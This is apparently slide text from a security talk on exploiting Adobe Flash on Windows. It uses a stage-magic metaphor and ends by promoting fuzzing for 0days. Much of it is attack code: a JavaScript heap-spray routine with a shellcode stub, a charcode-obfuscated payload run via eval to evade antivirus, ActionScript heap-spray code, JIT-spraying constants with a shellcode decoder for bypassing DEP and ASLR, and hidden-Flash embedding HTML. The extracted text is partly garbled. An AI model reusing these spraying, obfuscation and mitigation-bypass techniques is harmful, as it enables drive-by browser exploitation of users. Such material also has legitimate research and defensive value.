Flash Exploit

Nanika naninb@gmail.com

魔術

薩斯頓三原則 表演之前絕對不透漏接下來的表演內容 不在同一時間 地點對相同的觀眾變同樣的表演 2 次以上 表演過後, 絕不向觀眾透露表演的秘密

Windows 防護弱點機制 /GS SafeSEH DEP ASLR

突破

破解魔術手法

一般弱點利用

Fish 應用範圍

成功魔術的需求

手法 ( 弱點利用 )

Why Spraying Not control precisely Not control Universal 12

NOP NOP 0x0c0c0c0c OR AL,0C 0x0d0d0d0d 0d OR EAX,0D0D0D0D 0x0a0a0a0a OR CL,BYTE PTR DS:[EDX] 0x0b0b0b0b OR ECX,DWORD PTR DS:[EBX] 0x0c0b0c0b OR AL,0B 0x14141414 ADC AL,14. 13

Not control precisely esi=0x41414141 mov eax,esi mov ecx,[eax] call [ecx+0x8] Offset 0x10 MEM 0x01140000 AAAAAAAAAAAAAAAA Offset 0x20 MEM 0x01140010 BBBBBBBBBBBBBBBBB 0a 0b 0c 0d 14

Not control esi=0x0c374512 not control mov eax,esi mov ecx,[eax]//no access call [ecx+0x8] 0x0c374512 0b 0b 0c 0d 15

Universal XP Stack overflow 0x0013ffac//cookie 0x0013ffb0//ret 0x0013ffc0 0x0013ffe0//seh 0x0013fff0 0x0014000//no access 2000 Stack overflow 0x0013ffa0 0x0013ffbc//cookie 0x0013ffc0//ret 0x0013ffe0 0x0013fff0//seh 0x0014000//no access 16

Classic javascript heap spraying var heapspraytoaddress = 0x12202020;//var payloadcode = unescape("%ue8fc%u0044.. ); var heapblocksize = 0x100000; var payloadsize = payloadcode.length * 2; var sprayslidesize = heapblocksize - (payloadsize+0x38); var sprayslide = unescape("%u0c0c%u0c0c"); sprayslide = getsprayslide(sprayslide,sprayslidesize); heapblocks = (heapspraytoaddress - 0x10C000)/heapBlockSize; memory = new Array(); for (i=0;i<heapblocks;i++) {memory[i] = sprayslide + payloadcode;} function getsprayslide(sprayslide, sprayslidesize) {while (sprayslide.length*2<sprayslidesize) } {sprayslide += sprayslide;} sprayslide = sprayslide.substring(0,sprayslidesize/2); return sprayslide; 17

JavaScript Encode <html><body><button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button></script><script language="javascript">var strtmp = String.fromCharCode(102,117,110,99,116,105,111,110,32,101,1 01,106,101,101,102,101,40,41,123,118,97,114,32,115,61,117,1 10,101,115,99,97,112,101,40,34,37,117,48,101,101,98,37,117, 52,98,53,98,37,117,99,57,51,51,37,117,102,54,98,49,37,117,51,52,56,48,37,117,101,101,48,98,37,117,102,97,101,50,37,117,4 8,53,101,98,37,117,101,100,101,56,37,117,102,102,102,102,37,117,48,55,102,102,37,117,101,101,52,97,37,117,101,101,101, 101,37,117,56,97,98,49,37,117,100,101,52,102,37,117,101,101,101,101,37,117,54,53,101,101,37,117,101,50,97,101,37,117,5 7,101,54,53,37,117,52,51,102,50,37,117,56,54,54,53,37,117,54,53,101,54,37,117,56,52,49,57,37,117,98,55,101,97,37,117,97, 97,48,54,37,117,101,101,101,101,37,117,48,99,101,101,37,117,56,54,49,55,37,117,56,48,56,49,37, );var ee = eval;ee(strtmp); 老梗還拿出來講 18

Flash 當防毒軟體針對 JavaScript 做了動態語意分析之後, 使用各種 Encode 技術通常無法欺騙防毒軟體, 最多只能作到欺騙分析人員增加分析人的作業時間 Flash 使用者非常的普及, 任何有安裝瀏覽器的都有安裝 Flash JavaScript 做得到的 Flash 大部分都做得到 19

防護目前最頭痛問題 沒有防不了的東西 不知道的東西防不了 似好似壞游走邊緣的

Flash Spraying public function MainTimeline() {addframescript(0, frame1);return;}// end function function frame1(){ shellcode = new ByteArray(); shellcode.writebyte(144); b = "\f\f\f\f";a = "\x0d\x0d\x0d\x0d"; while (b.length < 1048576-(shellcode.length+64))//2097152)//1048576) { b = b + a;} bytearr = new ByteArray(); gy = new ByteArray(); gy.writemultibyte(b, "iso-8859-1"); bytearr.writemultibyte(gy, "iso-8859-1"); bytearr.writebytes(shellcode, 0,shellcode.length); gy1 = new ByteArray(); gy1.writebytes(bytearr, 0,byteArr.length); gy2 = new ByteArray(); gy2.writebytes(bytearr, 0,byteArr.length); return; 21

Why Not To Do This? var c=0; var gy1:array = new Array(); while (c < 128)//2097152)//1048576) { gy1[c] = new ByteArray(); gy1[c].writebytes(bytearr,0,bytearr.length); c=c+1; } 22

Flash Spraying can not bypass DEP 23

JIT(BlackHat DC 2010) var y=(0x11223344^0x44332211^0x44332211 ); 0x909090:35 44332211 XOR EAX, 11223344 0x909095:35 44332211 XOR EAX, 11223344 0x90909A:35 44332211 XOR EAX, 11223344 0x909091:44 INC ESP 0x909092:3322 XOR ESP,[EDX] 0x909094:1135 44332211 ADC [11223344],ESI 0x90909A:35 44332211 XOR EAX, 11223344 24

var ret=(0x3c909090^0x3c909090^0x3c909090^0x3c909090^ ); 0x1A1A0100: 359090903C XOR EAX, 3C909090 0x1A1A0105: 359090903C XOR EAX, 3C909090 0x1A1A010A: 359090903C XOR EAX, 3C909090 0x1A1A010F: 359090903C XOR EAX, 3C909090 0x1A1A0101: 90 NOP 0x1A1A0102: 90 NOP 0x1A1A0103: 90 NOP 0x1A1A0104: 3C35 CMP AL, 35 0x1A1A0106: 90 NOP 0x1A1A0107: 90 NOP 0x1A1A0108: 90 NOP 0x1A1A0109: 3C35 CMP, AL 35 25

JIT Shellcode mov edi, 0x7946c61b mov al,0x1b push al CMP AL,0x35 inc esp inc esp inc esp CMP AL,0x35 inc esp inc esp NOP CMP AL,0x35 mov al,0xc6 push al CMP AL,0x35 inc esp inc esp inc esp CMP AL,0x35 inc esp inc esp NOP CMP AL,0x35 mov al,0x46 push al CMP AL,0x35 27

0347006A D9D0 FNOP 0347006C 54 PUSH ESP 0347006D 3C 35 CMP AL,35 0347006F 58 POP EAX 03470070 90 NOP 03470071 90 NOP 03470072 3C 35 CMP AL,35 03470074 6A F4 PUSH -0C 03470076 59 POP ECX 03470077 3C 35 CMP AL,35 03470079 01C8 ADD EAX,ECX 0347007B 90 NOP 0347007C 3C 35 CMP AL,35 0347007E D930 FSTENV DS:[EAX] 0x1A1A0110: 803F6E CMP [EDI], 'n' 0x1A1A0113: 6A35 PUSH 35 0x1A1A0115: 75EF short jnz 28

Decoder flow 0x1A1A0101: Decoder 0x1A1A0102: Decoder 0x1A1A0103: Decoder 0x1A1A0104: 3C35 CMP AL, 35 0x1A1A0106: Decoder 0x1A1A0107: Decoder 0x1A1A0108: Decoder 0x1A1A0109: 3C35 CMP, AL 35 0x1A1A010A: Magic 0x1A1A010B: Magic 0x1A1A010C: Magic 0x1A1A010D: 3C35 CMP, AL 35 0x1A1A010E: Encode Shellcode 0x1A1A010E: Encode Shellcode 0x1A1A010E: Encode Shellcode 0x1A1A010D: 3C35 CMP, AL 35 29

ALSR(Address space layout randomization) 30

JIT Spraying(1) function pageloadex() { var ldr = new Loader(); var url = "jit_s0.swf"; var urlreq = new URLRequest(url); ldr.load(urlreq);childref = addchild(ldr); } function pageload() { for(var z=0;z<2400;z++){pageloadex();} } function Loadzz1() { Security.allowDomain("*"); pageload(); } 31

WinXP Vista Win7 32

Bypass ASLR 33

JIT Spraying(2) <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#v ersion=6,0,29,0" width="0" height="0" id="myflash"> <param name="movie" value="bb.swf"> <param name="quality" value="high"> <param name="fullscreen" value="true"><param name="scale" value="exactfit"> <embed src="bb.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/xshockwave-flash" width="800" height="600"> </embed> </object> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#v ersion=6,0,29,0" width="0" height="0" id="myflash"> <param name="movie" value="bb2.swf"> <param name="quality" value="high"> <param name="fullscreen" value="true"><param name="scale" value="exactfit"> <embed src="bb2.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/xshockwave-flash" width="800" height="600"> </embed> </object> 34

WinXP & Vista 35

WinXP 36

Vista 37

PDF & Flash Acrobat 9.2 default Enable DEP Acrobat default support Flash Adobe: Turn off JavaScript in PDF Reader 38

WinXP PDF & One Big Flash 39

WinXP Vista Win7 40

Include Flash 41

創造 ( 尋找新的魔術 - 0day)

0day 自己找 等別人寄 收到也不知道 什麼是 0day 可以吃嗎?

第一等人, 是創造機會的人 第二等人, 是發現機會的人 第三等人, 是等待機會的人 第四等人, 是錯失機會的人 您是第幾等的人呢??

要怎樣尋找 0day 測試 測試 測試 不斷測試 天公疼憨人

http://rootkit.tw/blog/?p=173 0x66->0x40

收集大量範本 需要大量機器資源 範本丟入測試 自由活動 定時觀察報告

有誰在自動測試弱點? MS O 安全研究員 O 防毒? 地下駭客 O 政府? 軟體開發廠商?????

要怎樣收穫就要怎樣栽 不要守株待兔 安全還是靠自己最好 有興趣加入或贊助自動化測試弱點計畫來信寄到 naninb@gmail.com

Thank you Q & A